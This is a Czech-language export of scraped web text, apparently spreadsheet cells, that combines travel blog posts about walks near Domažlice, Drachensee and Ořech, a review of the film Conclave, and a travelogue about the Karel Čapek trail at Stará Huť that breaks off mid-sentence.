zajímavou a srozumitelnou formou základní informace o souvislostech a příčinách, které předcházely páté, a také poslední, křížové výpravě, která se odehrála právě u Domažlic . Domažlice – sochařská cesta na Baldov Národní památník Domažlice Jsme na vrcholu Baldov, v nadmořské výšce cca 550 metrů, kde se mimo vysílače, tyčí kamenný pomník ve tvaru kalicha. Výhled žádný, protože je mlha. Pomník připomíná zdejší husitské vítězství nad křižáky v bitvě u Domažlic 14. srpna 1431. Práce na budování památníku začaly koncem 20. let 20. století. Vítězný soutěžní návrh předpokládal vybudování 18 m vysokého monumentálního památníku–rozhledny a jeho autorem byl Kamil Roškot . Po položení základních kamenů v srpnu roku 1931 však zájem o památník postupně opadl a na místě více než 80 let zůstala pouze základna ve tvaru kvádru. V roce 2015 byl na základně odhalen nový pomník ve tvaru kalicha o hmotnosti 50 tun a o výšce 6 metrů, jehož autorem je klatovský sochař Václav Fiala . Národní památník Domažlice Lom Kousek od památníku je stezka, která vede kolem zdejšího živcového lomu. Jdeme jen kousek, mlha nedovolí cokoliv vidět a tak se pomalu vracíme. I v té mlze to byla příjemná a pěkná procházka, dlouhá asi 6 km. Mon, 21 Oct 2024 20:38:40 +0000 https://www.kamsevydat.cz/?p=180201 S Doctorem kolem Drachensee Tenhle výlet začal po naší přednášce UŽIJEM SI NEPÁL v Klenčí pod Čerchovem. Přednáška se konala v opravdu příjemné kavárně GORILLA CAFÉ v milé společnosti Vladimíra Čecha a jeho hostů. Ubytované jsme byly u báječné Daniely a její rodinky v Červeném Mlýně na konci světa, se snídaní a domácím upečeným […] ]]&amp;gt; S Doctorem kolem Drachensee Tenhle výlet začal po naší přednášce UŽIJEM SI NEPÁL v Klenčí pod Čerchovem. Přednáška se konala v opravdu příjemné kavárně GORILLA CAFÉ v milé společnosti Vladimíra Čecha a jeho hostů. Ubytované jsme byly u báječné Daniely a její rodinky v Červeném Mlýně na konci světa, se snídaní a domácím upečeným chlebem, vejci, vše jak od maminky, odkud se nám druhý den ani moc nechtělo…Dostaly jsme několik typů na výlety jak v blízkém Německu tak i kolem Domažlic . Červený Mlýn kousek od Klenčí pod Čerchovem Gorilla Café – Myšlenka vytvořit prostory pro příjemné posezení s přáteli, rodinou, kolegy či partnerem, vznikla v našich hlavách na dlouhých cestách po světě. Kromě sdílení zážitků prostřednictvím foto-obrazů a cestovatelských přednášek jsme cítili potřebu vše posunout o stupeň výš. A tak vznikla myšlenka propojit náš záměr s ochranou přírody. Proto také prodáváme kávu připravovanou z fair trade zdrojů a proto bude také pravidelně odcházet z naší kavárny 10% ze zisku na konto národního parku Kahuzi Biega v Demokratické republice Kongo ./ Drachensee Jsme v obci Seuchau, nedaleko městečka Furt in Wald , na značeném parkovišti, které je zdarma. Počasí není úplně ideální. Sluníčko zapomnělo vyjít. Vstupujeme na stezku, jezero je možné celé obejít. Kolem jezera jsou kovové lavičky pro příjemné posezení s pohledem na vodní plochu. Informace, které kolem jezera poskytují návštěvníkům informace a přehled o jezeře, najdete tady informační tabule o druzích zvířat a ptáků, ryb, které v jezeře žijí, většinou psané v němčině i češtině, pokud ne, jsou opatřeny QR kódem. Dračí jezero – Drachensee My začínáme na straně, kde je zajímavá vyhlídka. Skulptura, do které je možné vstoupit, představuje symbol pro přiblížení lidí z jedné i druhé strany hranice. Doctor odvážně stoupá nahoru pro packy ne moc příjemném kovovém schodišti. Skulptura je ale také částí legendy o drakovi, iniciátor pravěkých pocitů mezi strachem a napínavou podívanou. Vstoupit do tohoto rezavého prostoru podobajícímu se tělu, vydávajícímu prapodivné zvuky. V noci mezi 22 hod a 24 hod padne do vody proud světla a zbarví ji do červena. Krátce se objeví zraněný bod. Symbol otevřené rány. Zůstane zelené tajemné světlo zářící v jeho vnitřku. Socha je vyrobena z velmi hodnotné oceli Corten. Pokračujeme po cestě kolem jezera.. Celá východní část je ponechána nerušenému vývoji přírody. Několik schovaných míst pro pozorování zaručuje dobrý výhled a působivé přírodní zážitky. Kovová lávka rozděluje vodní plochu, západní část slouží také k rekreačním účelům, jachtingu a windsurfingu nebo v teplých dnech k příjemnému koupání. Dračí jezero – Drachensee Dračí jezero je retenční nádrž, která vznikla jako potřréba lidí ochránit majetek před ničivými záplavami a je součásti ochrany před záplavami Bavorského vodního hospodářství. Nádrž byla naplánovaná a návrhy schváleny již v sedmdesátých letech minulého století. Vystavena byla v letech 2003-2009 – na základě aktuálního, technicky dokonalejšího plánu. Dračí jezero – Drachensee Údolní přehrada Dračího jezera Byla vybudována v místě úžiny Chambského údolí mezi vrcholy Einbergu a Diebergu, tvoří ji kontrolní budova uprostřed hráze ne severní a jižní straně jezera. Víceúčelový objekt řídí odtok vody. Pomocí dvou uzávěrů se docílí zahrazení vody. Dva základní odtoky umožňují v případě potřeby vypuštění jezera. Turbína zabudovaná do prostředního pilíře slouží k výrobě elektřiny. Provozovna slouží jako centrála pro řízení přehradní nádrže, kontrolu přehrady, a také pro servisní a údržbářské práce. přehrada Dračí jezero – Drachensee Kolem jezera jdeme krásných a pohodových 6 km. Doctor cestou samozřejmě hlavně nenápadně se jde napít, aby mohl nerušeně spočinout na hladině a vykoupat se. Dračí jezero – Drachensee Moc hezká procházka. Ořech – vyhlídka Vrtule a cesta do lomu https://www.kamsevydat.cz/orech-vyhlidka-vrtule-a-cesta-do-lomu-na-hlinu/ Mon, 14 Oct 2024 15:52:46 +0000 https://www.kamsevydat.cz/?p=176526 Vyhlídka Vrtule Dnešní den jsme se vydaly do přírody. Do obce Ořech to máme autem 12 minut. Zaparkovaly jsme u hřbitova, přešly silnici a vydaly se na zdejší kopec, který byl vybudován uměle ukládáním výkopové zeminy a suti podle projektu. Budování bylo zahájeno v roce 1994 a původně byl tvořen jako základna pro budoucí vodojem. […] ]]&amp;gt; Vyhlídka Vrtule Dnešní den jsme se vydaly do přírody. Do obce Ořech to máme autem 12 minut. Zaparkovaly jsme u hřbitova, přešly silnici a vydaly se na zdejší kopec, který byl vybudován uměle ukládáním výkopové zeminy a suti podle projektu. Budování bylo zahájeno v roce 1994 a původně byl tvořen jako základna pro budoucí vodojem. Nahoru vede více cestiček, ale minout nemůžete. Kopec je z velké části holý, ale naše procházka začíná javorovou alejí, zlatavé listí všude kolem, divotvorné mraky pak dokreslují krásný podzimní den. CESTA NA VYHLÍDKU Vrtule v OŘECHU Jsme na vrcholu, odkud je překrásný výhled. Z kóty 397 m.n.m. Vidíme celou obec Ořech, polovinu Prahy a okolí obce. Při dobré viditelnosti jsou vidět i třeba Krkonoše , hrad Bezděz , Ještěd nebo Milešovka. Vrtule, konstrukce s houpací plošinou, je umělecké dílo od Ladislava Plíhala. Vrtule se ve větru otáčí a plošina se může na chvíli stát houpačkou nebo lavičkou. Dnes to tady docela fičí, v dálce vidíme retenční nádrž a tak scházíme vlevo z kopce dolů. Stráň je pokryta velkým množstvím šípků, některé už jsou měkké a tak si dáváme vitamínovou bombu v podobě vymačkaného džemu z jednotlivých plodů. Mňam. Kolem nás je krásně barevno, dvakrát nás vyděsí zajíc /nebo my jeho/, srnky na vzdáleném poli se shlukují a nás si nevšímají. Přes pole se dostáváme až k vodní ploše. vyhledy – vyhlídka vrtule Ořech Retenční nádrž Průtočná retenční nádrž byla vybudována na Ořešském potoce v 80. letech 20. století při výstavbě Pražského okruhu a jejím účelem je zachycovat nárazové srážky nebo případné ekologické havárie spojené s provozem této dálnice. retenční nádrž Oŕech Lom na hlínu Od retenční nádrže pokračujeme pěšinkou mezi poli k lomu v Zadní Kopanině. Nebýt na pozadí barevných náletů el. rozvodna v Řeporyjích , vypadá to tu jako v nějaké prérijní krajině, procházíme mezi haldami kamení až přicházíme k vodní ploše, kolem jsou vrásčité břehy, místy se nám maže na boty klouzavý jíl. Barevné odstíny vody, kamení, rostlin, jílů schovaných pod kupami černých mraků jsou nádhernou podzimní kulisou. lom na hlínu Zadní kopanina Geologická charakteristika lomu: V zachovaných stěnách bývalé těžebny keramických jílů v okolí zbytkové vodní plochy jsou odkryty dvě polohy šedých až tmavošedých jílovců až uhelnatých jílovců, oddělených od sebe polohami křemenných a jílovitých pískovců až slepenců, místy silně proželezněných. Profily dokládají fluviální až lakustrinně-estuarijové prostředí sedimentace. V organikou bohatých jílovcích se nalézá bohatá fosilní flóra, která představuje pozůstatek vegetace z pobřeží menší řeky, která tudy ve středním cenomanu protékala směrem k severu. lom na hlínu Zadní kopanina Převažující otisky rostlin z okolí řeky, které známe i z jiných nalezišť. Patří k nim složené květenství Mauldinia bohemicai, které se vyskytuje v asociaci s listy Grevilleophyllum constans a květenství Pragocladuslauroides s asociovanými listy Myrtoidea geinitzii. Celkem hojně se dále vyskytuje Araliaephyllum kowalewskianum, méně časté jsou zlomky vějířů kapradin (např. Anemiafremontii). Vzácně se vyskytuje „Dryandra“ cretacea popsaná ze zaniklé lokality Praha - Malá Chuchle . V pískovcích jsou nalézány stopy po činnosti organismů. Poměrně časté jsou kulovité limonitické a pelosideritové konkrece. Fosilní rostlinné zbytky jsou unikátní a dosud fytopaleontologicky plně nezpracované. Proželezněné pískovce jsou zde jedinou ukázkou jaký materiál byl v minulosti použit na pražské stavby jako jsou např. Juditin most z 12. století (původní lokality na Petříně a ve Střešovicích již neexistují). lom na hlínu Zadní kopanina část textu: Geology. cz Ořech je vesnice v okresu Praha – Západ, ležící na jihozápadní hranici Prahy (západní hranice metropole překonávající městský okruh je zároveň východní hranicí Ořechu). Zpět jdeme stejnou cestou, jen kopec obcházíme spodní částí zleva. Na vrcholu někdo pouští draka. pouštění draja vyhlídka vrtule Výlet to není dlouhý, ušly jsme něco málo přes 6 km tam i zpět.</t>
  </si>
  <si>
    <t>20241101_241_3243460934_3825d69992d99e5a9d9d.html</t>
  </si>
  <si>
    <t>3825d69992d99e5a9d9d</t>
  </si>
  <si>
    <t>Recenze: Konkláve je důmyslný thriller převlečený za náboženskou detektivku</t>
  </si>
  <si>
    <t>Shrnutí Recenze: Konkláve je důmyslný thriller převlečený za náboženskou detektivku (Foto: FilmNation Entertainment) Nová řada soutěže Vatikán hledá papeže, moderuje Ralph Fiennes . Máte rádi filmy, kde je každý slovní obrat nosný a každý pohled podezřelý? Konkláve odkrývá své kvality pomalu, ale ne nudně, a hlavně stojí za náš čas. Sledujte staré muže v hábitech, kteří pletichaří, aby získali pozici až posvátnou, na pozadí vatikánského umění a staleté zášti. Je to jako Survivor pro kardinály, intrikaření od začátku do konce a tvorba kmenů se stejnými hodnotami, jen bez sportovních výzev, zato se spoustou latiny. Ve filmu Konkláve režiséra Edwarda Bergera jsme zavedeni do stinných zákoutí Vatikánu , kde se kardinálové scházejí, aby rozhodli, kdo získá povýšení na ředitele společnosti, ehm, tedy pozici příštího papeže. Jde o hru plnou strategií, podvodů a dramat, která jsou obvykle vyhrazena televizním reality show. Ralph Fiennes hraje kardinála Lawrence, děkana kardinálského kolegia, který žongluje s krizí identity a zároveň řídí konkláve, v němž se střetávají obří ega a lidské vlastnosti, které nejsou v Bibli zrovna vychvalované. Vše se pomalu rozjíždí a láká nás do světa rituálů, tajemství, šeptandy a klasického boje o moc. Vše se pomalu rozjíždí a láká nás do světa rituálů, tajemství, šeptandy a klasického boje o moc. Ale jakmile začnou létat hlasovací lístky, podívaná je to rozhodně poutavější než nedělní bohoslužba. Sledujeme střet tolerantních liberálů a konzervativců, kteří by z Vatikánu udělali středověké muzeum, kdyby mohli. Stanley Tucci v roli kardinála Belliniho přináší smířlivý nádech, slibuje změnu a přitom útrpně přiznává, že tuhle pozici vlastně nechce, “ale když jinak nedáte…”. Tremblay v podání Johna Lithgowa zase dokáže ztělesnit oportunismus tak, jak to zvládají jen kandidáti na amerického prezidenta. Přidejte kardinála Tedesca v podání Sergia Castellitta, který s nostalgií vzpomíná na časy latinských mší a pořádnou dávku tradice, a máte konkláve, které stojí za to sledovat. Závěr nebude každému po chuti a může se zdát pohádkový, naivní, ale sledujeme přece jen film, a buďme vděčni, že alespoň v tom filmovém světě můžou věci končit idylicky, když ten reálný nám takovou variantu moc často nenabízí. Vizuální stránka Konkláve je bohatá na vatikánskou velkolepost, kamera Stéphana Fontaina nám však dopřeje také klaustrofobický pohled do skromných prostor, kde jsou kardinálové po celou dobu uzavření před světem. Berger nás nenechá kochat se přepychem příliš dlouho. Vatikánské zlato a mramor se brzy ponoří do tajemného šera a úzké, tmavé chodby a posvátné sochy vytvářejí spíše atmosféru zrady a úskoků než útěchy a lásky k bližnímu. Vše podtrhuje hudba Volkera Bertelmanna se smyčci, které dokážou dodat naléhavost a důstojnost, které je tu tedy už tak až až. Co se týče hereckých výkonů, Fiennes není namyšlený intelektuál, předvádí excelentní výkon s tou správnou dávkou únavy ze světa a pochyb o … lecčems. Jeho postava se potýká s osobní krizí víry a zároveň se snaží orientovat ve změti aliancí a zákulisních dohod. Většina jeho hereckých kolegů je obsazená tak bravurně, že by svou roli každý skvostně zahrál, i kdybychom je vzbudili ve tři ráno po lahvince mešního vína . Berger přináší napínavou režii a herecké výkony na celé čáře září, přičemž herci vnášejí do svých rolí tu správnou směs šarmu, pochyb, ambicí a zloby. Musíme být připraveni na spoustu dialogů, nemůžeme čekat, že si to kardinálové rozdají pěstmi. Konkláve odvádí mistrovskou práci při vytváření poutavého církevního světa, který dokáže být pro diváka zábavný. Kdo by to byl řekl, že můžete být napjatí, kdo vyhraje volby ve Vatikánu ? A že nám bude nakonec líto, že nešlo o reality show? „A ty jsi ještě nepřešel na elektronické cigarety?“ (Foto: FilmNation Entertainment) „S čím jste pral to roucho, že ho máte do fialova?“ (Foto: FilmNation Entertainment) „Starý brachu, tohle bude zábava.“ (Foto: FilmNation Entertainment) 85 % Konkláve / Conclave Berger přináší napínavou režii a herecké výkony na celé čáře září, přičemž herci vnášejí do svých rolí tu správnou směs šarmu, pochyb, ambicí a zloby. Musíme být připraveni na spoustu dialogů, nemůžeme čekat, že si to kardinálové rozdají pěstmi. Konkláve odvádí mistrovskou práci při vytváření poutavého církevního světa, který dokáže být pro diváka zábavný. Kdo by to byl řekl, že můžete být napjatí, kdo vyhraje volby ve Vatikánu ? A že nám bude nakonec líto, že nešlo o reality show? Hodnocení čtenářů: 65% Autor: Karolina Benešová Autor person Karolína Benešová Rubrika transition_slide Recenze filmů</t>
  </si>
  <si>
    <t>1860</t>
  </si>
  <si>
    <t>1190</t>
  </si>
  <si>
    <t>20241101_242_3264627948_04e1ec7563bb4a4eb78a.html</t>
  </si>
  <si>
    <t>04e1ec7563bb4a4eb78a</t>
  </si>
  <si>
    <t>Přes střední Čechy na Vysočinu - 2. den: pivovar Hostomice pod Brdy; Stará Huť - okruh cca 9,5 km po NS Karla Čapka: rybník Strž - bývalé hamry - zřícenina mlýna Plechhamr - Měsíční vyhlídka - muzeum Památník K. Čapka - rybník Strž</t>
  </si>
  <si>
    <t>Přes střední Čechy na Vysočinu - 2. den: pivovar Hostomice pod Brdy; Stará Huť - okruh cca 9,5 km po NS Karla Čapka : rybník Strž - bývalé hamry - zřícenina mlýna Plechhamr - Měsíční vyhlídka - muzeum Památník K. Čapka - rybník Strž Pivovar Hostomice pod Brdy • Foto: jircak Neděle 28. 7. 2024 Když jsem se po půlnoci vzbudila horkem, už venku neprší. Větrám a nechávám opět pootevřené boční dveře. Situace zvečera se opakuje. Začíná pršet, takže dveře opět zavírám a usínám. I v noci jsem registrovala, že občas prší. Dveře tedy zůstaly po zbytek noci zavřené, i když bylo v autě horko. Ráno nás sluníčko nebudilo. Vstáváme v půl deváté, venku je přes 20 stupňů, je zataženo a příjemně to profukuje. Občas spadne pár kapek. Na koupališti Biotop se chystají na návštěvníky. V 9 hodin otevírají, ale lidé se tam nehrnou. My dnes nepospícháme. Máme v plánu cca 8,5 km dlouhý okruh, času máme dost. V klidu si dávám kávu, jen mne od rána honí mlsná. Musím si nechat zajít chuť. Okolo 10. hodiny vyrážíme. Přímo na trase máme pivovar Hostomice. Tvrdím, že bude zavřeno, ale v neděli otevírají skutečně už v 10 hodin. Kupuje si na večer 4 plechovky. Jenže lednice je plná jídla. Tam se vejde jen jedna, zbylé 3 zkoušíme zabalit do dek, aby moc nezteplaly. Pokračujeme v cestě, když nás u Dobříše zaujme cedule jahody - akce, meruňky z Moravy . Kupujeme oboje, i když cena 89,- Ķč za 1/2 kg jahod se mi moc akční nezdá. Vypadají však dobře a jsou výborné. Snědli jsme je hned. Meruňky jsou ještě tvrdší, necháme je pár dnů uležet. Jedeme do Staré Huti. Nepatří mezi nejstarší naše obce, byla založena až r. 1674. Majitel zdejšího panství byl však podnikavý. Využil výhodných přírodních podmínek, hlavně výskytu železné rudy, dostatku dříví a vhodných vodních zdrojů a vybudoval zde hutě. Postupně vybudoval soustavu čtyř hamrů na zpracování surového železa. Jenže naši občané práci v hutích neznali, přicházeli sem noví lidé, bylo nutno jim zde umožnit bydlení. Zvyšoval se počet obyvatel, rozvíjela se zde i průmyslová výroba. Vznikla zde první válcovna železa v Čechách , ale i v Rakousku , později byla přestavěna na strojírnu. Kolem r. 1870 se tu vyráběly litinové vany, výlevky, toaletní mísy, potřeby pro zemědělství a strojírenství. Obec se vyvíjela, r. 1940 sem byla zavedena železniční trať, o tři roky pozdějí el. energie, a to i do bytů, byla otevřena pošta. Léta 1. světové války byla pro obyvatele těžká. Ale ani po ní to nebylo jednoduché. Starohuťské železárny, kde nejvíce obyvatel našlo svoji obživu, byly r. 1926 po 250 letech uzavřeny. Nyní tudy vede naučná stezka, která mimo jiné i tyto staré doby připomíná a kterou si chceme projít. Parkujeme na parkovišti Rybník Strž. Je to na rozcestí turistických tras. Je tady kiosek s občerstvením. Otu třetinka Prazdroje za 55,- Kč nezaujala, já si však za stejnou cenu dávám domácí čokoládový dortík s borůvkami. Moje dnešní mlsná mne přemohla. Je výborný, udělala jsem dobře. Odtud jsem naplánovala asi 7,5 km dlouhý okruh po naučné stezce Karla Čapka . Dozvíme se na ní informace o osobnostech, které jsou s těmito místy spojeny, o stavbách, ze kterých už zbyly jen rozvaliny, o přírodě, ale také o zdejší hutní výrobě. Je rozdělena do tří okruhů a je na ní 10 zastávek. Trasa je značená oranžovým piktogramem psa Dášenky. Ale chvíli mi to trvalo, než jsem přišla na to, že to, co mi připomínalo hlavu medvěda, je právě piktogram Dášenky. Nejsem asi umělecky založená, Ota to prý poznal hned. Z parkoviště odcházíme po modré směr Chramiště. Informační tabule naučné stezky jsou hezky napsané, dokonce jsou oboustranné, takže informací máme dost. Ani nám nevadí, že už zase jdeme obráceně. Zpočátku jdeme po sluníčku, procházíme chatovou osadou. Z louky Francouzky se nám otevírají i hezké výhledy. Současně se dozvídáme, že louka je pojmenována po francouzských vojácích, kteří tu tábořili po válce o rakouské dědictví r. 1741. Konečně jsme v lese. Přicházíme ke kamennému mostu, kde býval čtvrtý, zvaný Dolejší hamr na výrobu železa, ten byl od železárny s vysokou pecí nejdál. Používal se od poč. 18. století až do 90. let 19. století, to už však byla více méně jen kovárna. Na konci 19. století skončila éra zdejších hamrů - v té době se začaly využívat modernější výrobní metody. V chalupách, které vznikly v 19. století v blízkosti hamrů, se bydlelo až do 50. let 20. století. R. 1959 byly zbytky obytných staveb i hospodářských budov strženy. Moc tam toho tedy nezbylo. V lese mezi stromy je vidět několik ovocných stromů, musí se tam dát pozor, protože tam jsou prý i nezabezpečené zbytky studní. Na bezejmenném rozcestí u mostu odbočujeme prudce vlevo roklí do kopečka na 3. okruh naučné stezky ke zřícenině mlýna Plechhamr. Jeho historie je skutečně zajímavá. Byl postaven r. 1698, zpracovávala se tam měď, vyráběly se tam měděné plechy. R. 1723 výroba plechů ukončena a objekt byl přestavěn na pilu a mlýn. V té době zde ve skále byl vytesán hluboký sklep, kde se i v pozdějších dobách uchovávalo dobré jídlo a pití. Mlýn byl často poničen velkou vodou, ale vždy byl znovu obnoven. R. 1895 tu byl již jen mlýn, kdy přesně byla zrušena pila, to se neuvádí. Během 19. století se s rozvojem turistiky stal cílem vycházek. Mlynář jim začal poskytovat jídlo a pití. Dokonce sem jezdila i kněžna z Dobříše . Na zahradě byl postaven taneční parket a každou sobotu se zde pořádaly taneční zábavy, konaly se zde i přírodní divadelní představení, nejčastěji Z Českých mlýnů. V noci 16. září 1931 byl mlýn úmyslně zapálen. Hasiči přijeli pozdě. Shořelo mlýnské zařízení, ostatní budovy byly značně poškozeny. Z mlýna zůstaly pouze mohutné zdi. Od té doby tady vše chátralo. Neudržovaná hráz nevydržela nápor ledu v zimě 1940/41 a protrhla se. Místo rybníku tu zbyl močál. Ještě po r. 1949 se nechalo po mostě přejít, dokonce se tady pokračovalo v tradici slavností a divadelních představení. V 50. letech 20. století se údolí kolem mlýna stalo cílem trampů. Líbily se jim velké sklepy. Ty byly někdy v letech 1962 – 1963 odstřeleny protože trempům komunisté vůbec nefandili. Zřítila se i jedna stěna budovy, k mlýnu byl zamezen přístup. Od pol. 60. let 20. století se tato oblast stala součástí vojenského prostoru. Zbytky protržené hráze sloužily k ostré střelbě vojáků. Dnes je zde zajímavý kout přírody se zbytky mostních pilířů i malé zbytky mlýna. Tady u potoku je informační tabule naučné stezky, která tady podle mapy.cz končí. Na mapě okruhů na informačních tabulích je čárkovaně vyznačen 3. okruh - přes potok, okolo Plechhamru, který byl právě až za potokem na cestě ke žluté turistické trase. Na břehu, kde stojíme, vidíme zbytky stavby - to ještě netušíme, že to jsou zbytky mostu. Také vidíme, že k potoku vede z prudkého kopce pěšinka. Zdálky to vypadá, že se nechá potok přejít. Koukáme do mapy, potok tu má dvě ramena, jsou tu dva brody, za potokem pokračuje čárkovaná pěšina a vše nasvědčuje tomu, že bychom se mohli skutečně dostat na žlutou a na naši trasu. Bude to sice asi o kilometr delší, ale to nám zase tak nevadí. Čas máme. Zkusíme to. Kdybych tušila, jak to bude dobrodružné, pro mne skoro nemožné, asi bych k tomu potoku ani nešla. Jenže moje zvědavost a chuť to projít byla velká. U potoka jsme za chvíli. To tak hrozné nebylo, jen kousek z prudkého kopečka. Podle mapy tu má být brod, je tu však také nějaká kláda, po které se snad nechá přejít. Voda je kalná, vstup do ní není zrovna nejlepší, brodit se mi nechce, skoro se dá říct, že to ani nejde. Naštěstí potok není široký. Ta první část není nejhorší. Přes potok je položena poměrně úzká kláda, další ještě tenčí je upevněná na stromy na obou stranách říčky jako zábradlí. Jenže se houpe všechno. Kláda pod nohama i kláda - zábradlí. Nepomohlo ani to, že mi to Ota na jedné straně držel. Bála jsem se, ale nakonec jsem se s vypětím všech sil na druhou stranu dostala. No, na druhou, spíš do středu potoka. Tady pokračovalo něco mezi potokem, bažinou a stojatou vodou. Vypadalo to, že sem voda přinesla různé klacky a ztrouchnivělé klády. Kdybych měla s sebou turistické hůlky, byla by to legrace, ale takhle jsem si nebyla jistá, zda mi noha neuklouzne a já někam nezahučím. Ale i to jsem zvládla. Konec byl pak po kamenech - to už byla hračka. Jenže to jsem netušila, co nás čeká při překonávání druhého ramene. Když jsem to uviděla, zděsila jsem se. Tam se snad nemohu dostat. Ale nechtělo se mi už ani se vracet. Raději bych šla vodou, ale to nešlo. Přes vodu byla položena poměrně úzká kláda, vedle ní ještě jedna, ale rozpůlena. S tou první byla spojena tenkými prkýnky, které z větší části svou funkci již dávno neplnili. Bylo to snad 3 metry. Těžko odhadnout. Hrůza. Ota vyrazil jako první, ale hned se vrátil pro dlouhý klacek, který použil jako bidlo. Naštěstí potok nebyl hluboký, bidlo bylo dlouhé a tak se celkem dobře dostal na druhou stranu. Pracně jsme si ho zvládli i podat. Jenže, jak jsem se o něj chtěla trochu opřít, bidlo se prohnulo. Nakonec jsem ho měla spíš jako psychickou podporu, naštěstí. Měla jsem pocit, že se o něj ani neopírám, jenže když jsem byla uprostřed lávky, bidlo najednou prasklo. Jak je možné, že jsem já zůstala na lávce s polovinou klacku, stále nechápu. Já tam však skutečně stála, ale zůstala jsem celá ztuhlá jako přilepená. Byla jsem naprosto bezradná, neschopná dalšího kroku, neschopná se pohnout. Kdyby mi Ota nepomohl, stojím tam snad ještě teď. Konec lávky byl relativně už v pohodě, tak se Ota pro mne vydal s jiným klackem, krátkým, ale pevným. Ten mi podal a díky tomu jsem se o kousek k Otovi posunula, ale to už jsem byla konečně na trochu bezpečnějším místě. Teď měl problém Ota. Potřeboval se otočit. Na couvání si netroufl. Nakonec to s mojí pomocí zvládl a tak jsme si ten poslední úsek pomáhali navzájem. Konečně jsme se oba dostali na druhou stranu. Já však tou hrůzou byla celá zpocená a navíc tak rozklepaná, že jsem si musela na chvíli odpočinout. Až tady jsme pochopili smysl cedule, která byla u potoka na konci naučné stezky ještě před sestupem k řece. Kdo chce kam, pomozme mu tam - trasa tety Kateřiny. Už tohle nás mělo varovat. Jenže toho, že dostanu rozum, se už asi nedočkám. Protože nás by asi nezastavila ani cedule, že trasa je na vlastní nebezpečí nebo že je neschůdná. Ale zvládli jsme to a to je hlavní. Kupodivu mne cestou ani nenapadlo, že bych do vody mohla spadnout. To by bylo o to horší, že bych určitě utopila tablet, foťák i mobil. To by byla tragédie, protože to je to, bez čeho se neobejdu. Tedy hlavně ty první dvě věci. Tady nechci nikoho odradit od této cesty. Mám trochu závratě, které mi to vše ztěžují. Takže ten, kdo takové problémy nemá, by to zvládnout měl. Zvlášť když nepatří do kategorie seniorů. Ale jak je vidět, problém neměl skoro ani Ota. Pak jsme se vydali po cestě podle mapy v tabletu. Tento 3. okruh nemá žádné značení. Aspoň my ho neviděli. Viděli jsme zbytky mlýna, nakonec se nám tady líbilo. Jen pečlivě sledujeme mapu, neradi bychom si cestu prodloužili víc, než je nutno. Když jsme došli na náhorní planinu, byli jsme moc spokojení. Tam bylo fakt krásně. Dokonce jsme se ještě vydali po další neznačené odbočce ke skalní Měsíční vyhlídce, téměř nejvyššímu dnešnímu bodu. Tam byla lavička a dřevěná socha - že by to byla Měsíční víla? To už nikde nepíšou, ale mně by se to líbilo. Tady bylo tak hezky, že jsme zapomněli i na útrapy, které tomu předcházeli. Trefili jsme správné cestičky, takže se nám podařilo dostat se na žlutou turistickou trasu a po té dojít na rozcestí Nad čtvrtým hamrem, kde jsme navázali na druhý okruh naučné stezky. Pokračujeme po žluté a po naučné stezce. Jen ten kousek ke kamennému mostu, kde jsme se vydali na 3. okruh vynecháváme. I tady musíme překonat potok Kocába, ale tady je už relativně normální lávka. I když i ta má už něco za sebou. Je nakloněná, je však širší a hlavní je, že se nehoupe. Míjíme v lese ukrytou roubenku. Naučná stezka a místní červený okruh má odbočovat ze žluté vpravo. Kdybych to však podle mapy nehlídala, určitě bychom neodbočili. Moc dobře značené to není. Konečně se držíme přímého směru a čteme si informační tabule, které tady už zase konečně vidíme. To má úžasnou výhodu. Ota to čte skutečně poctivě. Čte to vždy pomalu, ale spoustu věcí si z toho zapamatuje. Já to očima jen tak přelétnu, a nic si z toho nepamatuju. Proto si to většinou vyfotím a čtu to až doma. Tabulí je tu dost, nemusím spěchat. Ota mne vždy zvládne dojít. Přicházíme k malé vodní ploše Zájezek. Podle něho byl pojmenován i třetí hamr, který byl pod rybníkem. První zmínky jsou z poč. 18. století, zaniká po r. 1880, jako většina zdejších hamrů, protože se zaváděly modernější způsoby výroby kujného železa. Na potoce jsou ještě lehce patrné zbytky náhonu a v blízkosti potoka i pozůstatky zdí. Potok je zarostlý, my to tady zas až tak neprozkoumávaly. Přicházíme k Památníku Karla Čapla. Nejdřív však vidíme vpravo vedle cesty plot. Dřív než ke vchodu k památníku, kde je dnes muzeum, jsme přišli k hrázi rybníku Strž, na jehož druhé straně parkujeme. Tady se dozvídáme, že to je jeden ze tří vzájemně propojených rybníků. V 50. letech 17. století pod hrází stával mlýn, který byl později přestavěn na hamr. Tabulí je na naučné stezce hodně, je tam i hodně povídání, to je také důvod, proč jsme sem přišli až po 3. hodině. Zdejší muzeum je ve vile, kterou dostali r. 1935 do doživotního užívání Karel Čapek s Olgou Scheinpflugovou jako svatební dar. Bohužel vila se mu stala osudnou. R. 1938 likvidoval škody způsobené povodní, dostal zápal plic, kterému 25. 12. 1938 podlehl. Dnes je v domě památník, který je věnován jejich osobnostem a jejich dílu. V areálu je bývalá hájovna, později dům správce, kde je dnes možnost občerstvení. Je tady poesiomat, kde je možno si poslechnut díla z počátků Čapkovy tvorby. Do muzea jít nechceme, ale i tady v zahradě, upravené na park, a v bývalých stájích je velké množství informačních panelů o K. Čapkovi a jeho manželce, ale také o zdejších bývalých i současných hutích, kde byly vyráběny dokonce i kašny na naše plzeňské náměstí. Tam také visí pamětní deska Járy Cimrmana s tím, že je umístěna (asi by mělo být, že byla umístěna) na domě v Dělnické ulici 12 ve Staré Huti, kde se narodila manželka Zdeňka Svěráka . Ten připustil, že právě tam na dvorku vznikla postava tohoto největšího nežijícího Čecha. Samozřejmě jsme si to tady také prohlíželi a částečně pročetli. Ne všechno, bylo tam toho skutečně hodně. K autu jsme dorazili po půl čtvrté, patřičně hladoví. Tady jsme se rozhodli, že na parkovišti zůstaneme přes noc. Sice by se nám víc líbilo parkoviště u muzea, jenže tam se autem běžně zajet nedá. Tady na parkovišti je už jeden karavan a také nevypadá, že by chtěl odjet. Udělali jsme si opožděný oběd. Ota se vrátil k muzeu, jednak si po obědě dát Kozla, kterého tam mají v plechovce, a pak si dočíst info tabule. Já mezitím umyla a uklidila nádobí a při relaxaci v křesílku málem usnula. Když se Ota vrátil, šli jsme se podívat k rybníku, jehož břeh je označený jako pláž. Jenže voda se nám na koupání nelíbila, zdálo se nám, že tam jsou už sinice. Koupačka tedy nebyla, ale vody máme v autě zatím dost. Mezitím zdejší kiosek balil a odjížděl. Je tu tedy pouze o víkendu. Když tu začal být klid, u auta jsme se umyli a lehce povečeřeli. To už jsme seděli u stolku, v jehož blízkosti stál kiosek. Svítí sem ještě sluníčko a je tu tedy teplo. Znovu si čtu úvodní zastavení naučné stezky, kde je psáno o stepi s vyhlídkou a 